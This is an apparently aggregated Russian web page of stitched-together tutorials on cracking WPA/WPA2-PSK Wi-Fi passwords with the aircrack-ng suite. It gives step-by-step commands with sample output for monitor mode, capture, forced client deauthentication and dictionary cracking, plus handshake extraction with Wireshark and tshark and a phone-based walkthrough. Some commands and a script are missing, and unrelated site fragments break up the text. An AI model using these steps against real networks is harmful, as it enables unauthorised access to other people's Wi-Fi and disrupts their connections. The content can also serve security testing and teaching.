1. Главная страница » Компьютеры » No valid wpa handshakes found

No valid wpa handshakes found

Автор: | 16.12.2019

Взлом wpa2

Это руководство объясняет, как взламывать сети, защищенные WPA/WPA2 с использованием Pre-Shared Key (PSK). WPA/WPA2 поддерживает много других способов аутентификации, но aircrack-ng взламывает только PSK, так что убедитесь, что airodump-ng показывает сеть с типом аутентификации PSK. В противном случае даже не пытайтесь в нее проникнуть.

Существует важное различие между взломом WPA/WPA2 и WEP. Если в WEP для ускорения процесса взлома используются статистические методы, WPA можно взломать только методом прямого перебора. Это происходит из-за отсутствия постоянного ключа, поэтому сбор начальных векторов (IV) отнюдь не ускорит процесс взлома, как это было бы при атаке на WEP. Единственный способ получить нужную информацию – начать перехват пакетов в момент установки соединения между клиентом и AP. Установка соединения происходит в тот момент, когда клиент входит в сеть (это не совсем верно, но в контексте данного документа, будем руководствоваться этим). Длина PSK может составлять от 8 до 63 символов, и чем она больше, тем меньше вероятность успешного взлома.

Но не все так безнадежно. В случае, если ключ является словарным словом или же менее 8 символов, взлом возможен. Отсюда, кстати, понятно, как создать неломаемую сеть – достаточно использовать WPA/WPA2 и ключ длиной 63 байта, состоящий из случайного набора букв, цифр и псевдосимволов.

Полный перебор – занятие не из легких. Поскольку требуются серьезные вычисления, компьютер может проверять от 50 до 300 ключей в секунду, в зависимости от мощности процессора. Перебор достаточно большого словаря может занять часы, если не дни, а если вы хотите сгенерировать свой собственный файл словаря, который включает в себя все комбинации букв, цифр и псевдосимволов, воспользуйтесь калькулятором времени перебора (http://lastbit.com/pswcalc.asp). Например, перебор пароля длиной 6 символов, состоящего из букв верхнего, нижнего регистров и цифр, займет 64 часа, а полный перебор уже 7-и символьного пароля – шесть месяцев. Думаю, не стоит говорить про 29 лет на перебор 8 символов.

Различий между взломом WPA и WPA2 нет, там используется одинаковая аутентификация, поэтому технология та же.

• вы используете пропатченные драйвера, умеющие делать инжекцию (http://www.aircrack-ng.org/doku.php? > • вы достаточно близки к клиенту, чтобы отправлять и получать от него данные. Запомните, то, что вы можете получать пакеты от AP, еще не значит, что у вас есть возможность отправлять на нее данные. Мощность точки выше мощности вашей карты. Проверить возможность отправки пакетов можно по линку, указанному в пункте выше;
• вы используете aircrack-ng 0.9 stable (иначе некоторые параметры могут быть другими).

Проверьте, что все условия соблюдены, иначе нижеприведенные советы вряд ли вам помогут. Также, не забудьте заменить ath0 на имя интерфейса вашей беспроводной карточки.

Чтобы проверить данное руководство в домашних условиях, вам необходимо иметь две беспроводные карточки. Мы используем следующие устройства:

• Атакуемый клиент с WPA2:
— MAC: 00:0F:B5:FD:FB:C2
• AP:
— ESSID: teddy
— MAC: 00:14:6C:7E:40:80
— Channel: 9
• Система AirCrack-ng:
— MAC: 00:0F:B5:88:AC:82

Наша цель – захватить пакеты во время установления защищенного соединения и использовать aircrack-ng для взлома PSK. Это можно сделать активным и пассивным способом. Активный заключается в посылке деаутентификационного пакета клиенту, пассивный — в ожидании, пока клиент начнет устанавливать WPA/WPA2 соединение самостоятельно. Преимущество пассивного способа в том, что отсутствует необходимость в инжекции, поэтому реализация атаки возможна и под Windows.

Вот наши основные шаги:
– запустить беспроводной интерфейс в режиме мониторинга на AP канале;
– запустить на этом же канале airodump-ng с фильтром по bssid;
– использовать aireplay-ng, чтобы деаутентифицировать беспроводного клиента;
– использовать aircrack-ng для взлома PSK ключа.

Шаг 1: запуск беспроводного интерфейса в режиме мониторинга

Итак, нам необходимо включить режим мониторинга. В этом режиме беспроводная карта ловит все пакеты в эфире, вместо обычного режима, когда она «слышит» только то, что адресовано ей. Перехватывая каждый пакет, мы можем отловить момент 4-х этапной WPA/WPA2 аутентификации.

Для начала остановим ath0:

# airmon-ng stop ath0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Убедимся, что нет других athX интерфейсов:

lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.

Если еще какие-то athX присутствуют, остановите их тоже. Теперь установим беспроводную карту на канал 9 в режиме мониторинга:

# airmon-ng start wifi0 9

В этой команде мы используем «wifi0» вместо привычного «ath0», поскольку используем драйвера madwifi-ng. Ответом будет что-то вроде:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Обратите внимание на строчку monitor mode enabled. Чтобы проверить, что интерфейс правильно сконфигурирован, запустите:

lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Вы видите, что ath0 работает в режиме мониторинга, на частоте 2.452, что соответствует 9 каналу, и что в AP стоит MAC-адрес вашей карты. В отличии от всех остальных, только драйвера madwifi-ng показывают ваш адрес в поле AP. Итак, все отлично. Очень важным моментом является проверка всех данных перед непосредственным процессом взлома. Если что-то не так, дальнейшие шаги могут оказаться бесполезными. Убедиться в соответствии частоты беспроводной карточки каналу можно по этому адресу: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels.

Читайте также:  1С справочник создать новый

Шаг 2: airodump-ng

Цель этого шага – отловить момент установки безопасного соединения с AP.

# airodump-ng -c 9 —bssid 00:14:6C:7E:40:80 -w psk ath0

-9 – это канал, на котором работает беспроводная сеть
—bssid 00:14:6C:7E:40:80 – MAC адрес AP. Этот параметр отфильтрует "левый” трафик
-w psk – имя файла, в который мы будут записываться пойманные IV
ath0 – имя нашего беспроводного интерфейса

Важно: не используйте параметр —ivs. Вы должны захватывать пакеты целиком. Итак, в случае, если к точке присоединен клиент, на экране появится что-то вроде этого:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

А если клиентов в данный момент нет, то это:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

Уточним, что иногда для перехвата момента установки соединения приходится совершать дополнительные телодвижения. Ваша карточка должна быть в том же режиме, что AP и клиентское устройство. Например, если ваша карточка в режиме B, а клиент – в режиме G, то отловить аутентификацию не получится. Также, иногда бывает нужно выставить ту же скорость, например 11 Мб или 54 Мб. В общем, если не удалось перехватить установку соединение сразу, следует поэкспериментировать.

Шаг 3: используем aireplay-ng, чтобы отсоединить клиента.

Этот шаг необязателен и выполняется лишь в том случае, когда вы хотите ускорить процесс взлома. Естественно, для выполнения нижеприведенных действий необходимо, чтобы к точке был присоединен хотя бы один клиент. Если в данный момент никаких беспроводных клиентов не наблюдается, расслабьтесь и переходите сразу к следующему шагу. Конечно, если в дальнейшем беспроводной клиент появится, никто не мешает вам вернуться и выполнить все описанные ниже команды.

Итак, на данном этапе мы посылаем беспроводному клиенту сообщение о том, что он больше не ассоциирован с AP. Клиент попытается установить соединение заново и пошлет именно те пакеты, которые нам нужны.

Основываясь на полученных данных из предыдущего шага, выполним на другой консоли следующую команду:

# aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

-0 означает деаутентификацию
1 – количество деаутентификационных пакетов (можно увеличить)
-a 00:14:6C:7E:40:80 – MAC-адрес AP
-c 00:0F:B5:FD:FB:C2 – MAC-адрес отсекаемого клиента
ath0 – имя нашей беспроводной карточки.

Ответ должен быть таким:

11:09:28 Sending DeAuth to station — STMAC: [00:0F:B5:34:30:30]

Деаутентификационный пакет шлется напрямую с вашего компьютера на компьютер клиента, поэтому убедитесь, что вы находитесь достаточно близко к последнему.

Шаг 4: запускаем aircrack-ng и ломаем PSK ключ.

Цель данного шага – попытаться взломать PSK ключ путем подбора по словарю. Небольшой словарик идет в комплекте с aircrack-ng (password.lst), более объемные словари можно легко найти в сети или сгенерировать самостоятельно при помощи известной программы John the Ripper.

Открываем новую консоль и запускаем:

# aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

-w password.lst назначает имя файла со словарем
psk*.cap назначает имя файла с перехваченными пакетами. Маска "*” используется, поскольку файл может быть не один.

В случае, если аутентификационные пакеты не найдены, вывод будет примерно следующим:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Read 1827 packets.
No valid WPA handshakes found.
Если это произошло, попробуйте повторить третий шаг и заново выбить беспроводного клиента из сети, чтобы он повторил процедуру установления соединения. Если вы использовали пассивный метод сбора пакетов, ждите дальше, пока не появится клиент, устанавливающий соединение. Вывод в случае нахождения подходящих пакетов будет таким:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target.

С этого момента aircrack-ng может начать взлом PSK ключа. В зависимости от скорости вашего процессора и размера словаря, этот процесс может занять часы или дни. Успешный взлом ключа выглядит так:

[00:00:00] 2 keys tested (37.20 k/s)

KEY FOUND! [ 12345678 ]

Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E

B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98

CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40

FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E

2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Этичный хакинг и тестирование на проникновение, информационная безопасность

В одном файле захвата сетевых данных (формат pcap) может содержаться более чем одно рукопожатие (handshake). Такое можно происходить, например, при продолжительной работе Airodump-ng, в результате чего она может перехватить несколько рукопожатий от одной или разных точек доступа. Рукопожатия из файлов, захваченных в «шумных» условиях нуждаются в дополнительной проверке и очистке.

Читайте также:  Hd 6870 vs gtx 750 ti

Несколько рукопожатий в одном файле можно получить искусственно, просто объединяя их в один файл. К примеру, программа Besside-ng (автоматически захватывает рукопожатия от всех дочек доступа в пределах досягаемости, для этого проводит атаку деаутентификация) создаёт единый файл .cap для всех захваченных пакетов рукопожатий.

Т.е. это не редкая ситуация, и для проведения атаки на сети, чьи рукопожатия находятся в одном файле, может потребоваться извлечь каждое рукопожатие.

Как разделить рукопожатия по разным файлам

Важно понимать разницу между файлом, в котором просто слито несколько рукопожатий, и файлом захвата в шумной среде. Пример анализа файла первого типа (с помощью aircrack-ng):

Пример файла второго типа:

Видно, что во втором файле имеется много мусора, и во всём файле всего два пригодных для взлома рукопожатия. Среди мусора много отдельных фреймов EAPOL (составляющих хендшейка), которые непригодны для подбора пароля.

Для просмотра содержимого файла можно использовать Wireshark. После открытия файла установите фильтр:

Ручное разбитие файлов рукопожатий с помощью Wireshark

Если вы работаете с файлом из слитых рукопожатий, то с ним не должно быть особых проблем. Открываем файл в Wireshark:

Можно использовать фильтр

Но он может оказаться и не нужным, поскольку и без того имеются только нужные пакеты.

Чтобы отфильтровать пакеты для определённой точки доступа, укажите её BSSID со следующим фильтром:

Теперь с помощью CTRL+m выделите нужные пакеты:

И в меню File выберите Export Specified Packets:

Введите имя файла и поставьте переключатель на Marked packets only:

Проверяем наш файл:

Всё отлично. Можно сделать ещё одну проверку с помощью coWPAtty, запустив команду вида:

Например, в моём случае:

Фраза «Collected all necessary data to mount crack against WPA2/PSK passphrase» означает, что собраны все необходимые данные для взлома пароля.

Для вычленения рукопожатия из захвата, выполненного в шумных условиях, необходимо приложить некоторые усилия. Начинам с фильтрации (замените 84:C9:B2:52:F6:37 на BSSID интересующей вас сети):

Хендшейк подходит для взлома пароля если:

  • обязательно включает в себя второй элемент (M2), а также третий (M3) (гарантирует, что было сделано подключение к сети) или вместо третьего элемента содержит первый элемент (M1) (рукопожатие подходит для взлома пароля, но нет гарантий, что было выполнено подключение и что вообще был введён верный пароль). Лучше, если удалось захватить все четыре элемента;
  • элементы рукопожатия должны следовать в нужном порядке;
  • между ними не должно быть слишком большого интервала времени (измеряется миллисекундами и микросекундами).

Смотрим следующий пример.

Первый набор фреймов EAPOL (выделен чёрным) – не соблюдено правило, что кроме второго должно быть третье или первое сообщение.

Второй набор (красный) – только одно сообщение.

Третий набор (жёлтый) – нет третьего или первого сообщения.

Четвёртый набор (оранжевый) – нет второго сообщения.

Пятый набор (зелёный) – подходит, поскольку имеется второе и первое сообщение. Время между сообщениями кажется приемлемым.

Выделяем и сохраняем нужные фреймы (я также выделил фрейм Beacon):

Наш файл проходит проверки:

Выделение рукопожатия с помощью tshark

tshark – это Wireshark, но без графического интерфейса. Эту программу можно также использовать для разделения большого файла захвата на отдельные рукопожатия. Для этого команда запускается следующим образом:

В ней нужно вставить свои значения для:

  • ИСХОДНЫЙ_ФАЙЛ.cap – файл с несколькими хендшейками
  • BSS > Пример реальной команды:

Решение ошибки Unsupported file format (not a pcap or IVs file). Read 0 packets. No networks found, exiting.

У некоторых пользователей при использовании tshark, а затем последующем открытии полученного файла в aircrack-ng возникает ошибка:

Чтобы этой ошибки не было, во время сохранения программой tshark к ней нужно указывать опцию -F pcap, которая задаёт правильный формат файла.

Скрипт для разделения рукопожатий

Для автоматизации разделения одного файла на рукопожатия, я написал скрипт. Помните, что если вы разбиваете файл полученный с помощью Besside-ng или искусственно при слиянии хендшейков, то скрипт отработает без проблем.

Если вы разделяете на отдельные хендшейки файл захвата, полученный в шумных условиях (например, во время длительной работы Airodump-ng), то скрипт будет работать так:

  • если для какой-либо точки доступа не найдено ни одного рабочего хендшейка, то все данные для неё будут отброшены (не будет создаваться файл вывода)
  • если для точки доступа найдено хотя бы одно рабочее рукопожатие, то все фреймы EAPOL будут сохранены в один файл.

Т.е. вам нужно будет самостоятельно открыть файлы вывода и проверить, нет ли в них лишних данных.

Хотя aircrack-ng вроде бы правильно находит нужный хендшейк, но с cap2hccapx (из набора hashcat-utils, используется для конвертации в формат хеша Hashcat) замечены проблемы, если предварительно не почищены ненужные фреймы EAPOL от непригодных хендшейков.

Создайте файл handshakes_extractor.sh:

И скопируйте туда:

Для запуска укажите .(p)cap файл, из которого нужно извлечь рукопожатия.

Пример работы программы:

Если найдено хотя бы одно рабочее рукопожатие, то в текущей директории создаётся папка вида 2018-04-13-155818, в которую в виде отдельных файлов сохраняются хендшейки для всех точек доступа.

Выводится информация об имени файла с сохранёнными фреймами, а также информация о самих сохранённых фреймах.

Когда не нужно разделять файл на отдельные рукопожатия

Вам необязательно предварительно разделять файл на отдельные хендшейки, если вы собираетесь использовать программу aircrack-ng. Для выбора цели вы можете воспользоваться опциями:

Программа cap2hccapx запишет все хеши (для взлома в Hashcat) в один файл .hccapx.

Чтобы записать хеш только для одной ТД, укажите её ESSID:

Все о MeeGo и Maemo в России.

Читайте также:  Nvidia geforce mx110 или amd radeon 530

Aircrack-ng: Взлом WPA через деаутефикацию[часть2]

Вторая часть статьи, чтобы понять о чём идёт речь, прочитайте про установку тут Aircrack-ng: Установка v1.1 с приятным сюрпризом+ Теория [часть1] и что такое aircrack-ng тут http://maemos.ru/2010/06/08/aircrack-ng

Итак, по взлому буду писать в двух вариантах, первый, GUI вариант, то есть с графическим интерфейсом, второй-классический, через консольку.
Взламывать будем мой роутер йоту ну и в случае с WEP новенький D-Link-овский роутер.

Как мы видим в качестве пароля было взято слово «происшествие» написанное английскими буквами в русской раскладке.
Взлом шифрованиеWPA2 так-же работает, как и в случае с WEP
Далее кладём его в папку FAS/diction в корне телефона.

Взлом WPA c GUI интерфейсом

Запускаем утилиту fAirCrack и идём сразу на вкладку Monitor

Сначала в столбце Injection кликаем на Enable, после в столбце Monitor Mode-Enable

Далее переходим на вкладку Access point, Выбираем WPA и жмём Scan

Найдя точку доступа выбираем ей и жмём Start Packet Capture. В открывшемся окне ждём, пока кто-либо подключится к сети

кликаем на X Terminal и нажимаем создать, после чего пишем комманды:

root
#aireplay-ng -0 5 –a (мак адрес точки) –с (мак адрес подключённого пользователя) wlan0

Где -0 деаутефикация
5 – количество пакетов деаутификации(5-ти хватит за глаза, но можно обойтись и одним)
wlan0 интерфейс wifi

Смотрим что изменилось в закладке с отловом airodump-ng

11 тысяч потерянных пакетов разом! Неплохо, хак сработал(вы увидите это если переключите быстро и пакетов деаутефикации будет много, а не 1)
Если точка доступа супер крутая и защищена от подобных действий (встречается в оборудовнии циско, на моём опыте) то придётся ждать, пока кто-то сам подключится к сети.
Останавливаем сканирование нажатием клавиш ctrl+c и переходим в fAircrack

Переходим на закладку decrypt и там выбираем файл скана и словарь, метод брутфорса-wordlist, после нажимаем decrypt.

Итак, пошла расшифровка по словарю, ждём, тут я советую разогнать аппарат с помощью команды #kernel-config limits 250 1150, и мы увидим, что скорость перебора возросла с 40 паролей в секунду до 110+
Внимание! Аппарат греется, так что лучше держать его в прохладном месте!

Ну а спустя некоторое время нас выкинет обратно в прогу.

переходим на вкладку Keys и жмём клавишу refresh saved keys, ну и если что-то поймали, то выделяем из списка файл и нажимаем Show key, видим наше заветное «происшествие»

В противном случае при нажатии refresh saved keys мы ничего не видим.
Но наверное вас волнует, что-же за второй метод брутфорса под названием John?

Как я и писал выше это прога широкого спектра действия, к ней есть всего 2 настройки, перебор по цифрам(Digits) и по тексту(Letters), вобще не спорю, вещь полезная, но к сожалению не на наш девайс, с скоростью 120 паролей в секунду перебирать будете оооочень долго(к сравнению у меня на компе с дополнительной видюхой от Nvidia и включённой CUDA перебор примерно 5800 паролей в секунду) Но тем не менее всё-таки попробуем.

Как мы видим толком ничего не изменилось, так-же идёт перебор по возможным словам, только в этот раз их генерирует John,а не заранее сохранённые на телефоне d dblt цщквдшые-a, я не буду рассматривать этот метод в консольном варианте взлома ибо считаю его бессмысленным для нашего аппарата т.к. ждать месяц бесприрывного брутфорса,хм, скорее телефон сгорит, чем пароль взломается:) вообще как вариант расшифровывать пароли на компьютере, а ловить телефоном, так шанс добраться до пароля в десятки раз выше. Ну а чем взламывать с компа? Если заинтересовало, добро пожаловать сюда http://www.backtrack-linux.orgНу а теперь как и говорил ранее-взлом WPA по старинке, через консольку.
Взлом WPA без GUI «понтов»

Переводим аппарат в режим монитора сетей:

root
#airmon-ng start wlan0

Далее ищем доступные сети командой

Останавливаем поиск, увидев подходящую сеть.
Далее набираем
#airodump-ng wlan0 –-bssid 00:25:62:FA:27:EB –w zahvat

Где
–bssid конкретный мак адрес точки
-w запись всего трафика(данных)исходящих от точки( Внимание! Ставить ключ –ivs как в случае с WEP нельзя!)
Канал так-же указывать нельзя, иначе будут проблемы с деаутефикацией!

Начинаем деаутефикацию, как в случае с GUI взломом

root
#aireplay-ng -0 5 –a (мак адрес точки) –с (мак адрес подключённого пользователя) wlan0

Останавливаем отлов ctrl+c

Далее начинаем перебор по словарю с помощью aircrack-ng

#aircrack-ng –w /home/user/MyDocs/FAS/diction/pass.dic zahvat*.cap

Где ключ –w отвечает за перебор по словарю, далее путь к словарю
А после сам отловленный файл + к нему еще приписана «*», этот символ в консоли означает любое количество любых символов, а поскольку программа airodump подставляет к файлам «-01,-02,-03…-n» мы избавляемся от надобности тестировать каждый файл.

На этом скриншоте пример захвата airodump-ом всех пакетов, без ключа –bssid, наглядный пример, поскольку напротив нужной нам сети есть как-раз пометка о пойманом пакете, который нужен нам для взлома
Ну и далее, если вы всё-таки указали –-bssid у нас есть два варианта:
1. Провал, мы не поймали ключи аутефикации

2. Удача, всё-таки поймали и теперь взламываем

Ну а в заключении, если всё-таки в словаре нашёлся нужный пароль мы видим

Всё, наше искомое «происшествие», мы взломали точку доступа WPA!
Теперь разберём взлом WEP и собственную защиту, а так-же генерацию трафика, фрагментированные и chop chop атаки. переходим к третей части статьи.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

*

code